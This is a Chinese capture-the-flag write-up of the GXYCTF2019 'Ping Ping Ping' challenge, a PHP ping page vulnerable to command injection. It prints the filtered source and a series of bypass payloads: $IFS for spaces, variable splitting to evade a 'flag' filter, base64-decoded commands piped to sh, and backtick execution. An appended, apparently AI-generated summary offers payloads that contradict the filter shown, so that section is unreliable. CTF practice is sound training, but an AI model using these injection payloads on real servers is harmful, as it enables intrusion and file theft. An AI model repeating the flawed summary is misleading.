[GXYCTF2019]PING PING PING

本文详细介绍了如何通过巧妙的参数替换和内联执行方法,绕过网站的安全过滤,成功获取隐藏的flag信息。通过观察网站对于特殊字符的过滤规律,采用不同的字符串处理技巧,最终实现了对目标文件的读取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

观察题目:

页面

/?ip=

主网址

http://09703780-fff4-4a8d-be6c-496d349f5c74.node3.buuoj.cn/

解题:

扫描目录:

?ip=127.0.0.1;ls

>>
flag.php
index.php

尝试读文件

?ip=127.0.0.1;cat%20flag.php
>> 
/?ip= 1fxck your space!
屏蔽了空格

替换空格

?ip=127.0.0.1;cat$IFS$1flag.php    //fxck your flag!
?ip=127.0.0.1;cat$IFSflag.php	   //fxck your flag!
?ip=127.0.0.1;cat${IFS}flag.php    //1fxck your symbol!  过滤{或}

查看php代码

?ip=127.0.0.1;cat$IFS$1index.php
PING 127.0.0.1 (127.0.0.1): 56 data bytes
/?ip=
<!--?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\-->|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&amp;|\/|\?|\*|\&lt;|[\x{00}-\x{20}]|\&gt;|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}

?&gt;
</pre>
    
    
总结:
    过滤的特殊字符:& / ? * < ' " \ () [] {}  
    "xxxfxxxlxxxaxxxgxxx" " " "bash" 

处理”flag“字符串

//参数替换方法
?ip=127.0.0.1;t=f;cat$IFS$1$tlag.php   (x)	//a=f.....lag.php被匹配了
?ip=127.0.0.1;t=l;cat$IFS$1f$tag.php   (x)  //未匹配flag但是也没有回显
?ip=127.0.0.1;t=a;cat$IFS$1fl$tg.php   (x)  //未匹配flag但是也没有回显
?ip=127.0.0.1;t=g;cat$IFS$1fla$t.php   (√)	
//尝试用bash
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash
//?ip= fxck your bash!
//bash被过滤了,用管道+sh替换
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
//内联执行方法
?ip=127.0.0.1;cat$IFS$9`ls`

取得flag:

flag{d807e4e6-f534-4662-ad95-6d4d57015391}
### BUUCTF GXYCTF2019 Ping Ping Ping Writeup 解题思路 该题目属于命令执行绕过类题目,主要考察选手对于PHP代码中的输入验证机制以及Linux命令执行的理解。以下是详细的解题分析: #### 题目背景 通过提供的代码片段可以看出,程序接收用户提交的`ip`参数,并将其作为`shell_exec()`函数的一部分来调用`ping`命令[^4]。然而,在实际运行过程中,存在多层正则表达式过滤逻辑,用于防止恶意字符注入和敏感关键字(如`flag`)的出现。 #### 绕过方法解析 ##### 方法一:利用`${IFS}`替代空格 由于题目明确指出对空白字符进行了严格过滤,因此无法直接使用空格分隔命令参数。可以通过引入环境变量`${IFS}`(Internal Field Separator),它默认表示为空白符,从而完成命令拼接[^3]: ```bash /?ip=cat${IFS}/flag.php ``` ##### 方法二:内联执行与反引号组合 除了替换空格外,还可以借助Shell内置功能——内联执行(Backticks)。这种方式允许在一个命令内部嵌套另一个子命令的结果作为其一部分参与运算[^1]: ```bash /?ip=`cat flag.php` ``` ##### 方法三:变量拆分重组 当某些特定单词被整体屏蔽时(例如这里的“flag”),可以考虑将目标字符串分割成多个部分分别赋值给不同变量名,最后再动态组装起来形成最终路径[^2]: ```php /?ip=127.0.0.1;b=ag;a=fl;cat$IFS$a$b.php ``` 以上三种方案均能有效规避现有检测规则限制的同时达成预期效果即读取服务器上的文件内容。 #### 实际操作演示 假设我们已经找到了合适的payload,则可以直接访问对应URL地址获取FLAG信息。例如采用第二种方法的话请求形式如下所示: ```http GET /?ip=`cat%20flag.php` HTTP/1.1 Host: target-server.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` 如果一切正常,响应数据中应该会包含我们需要的目标文件具体内容。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值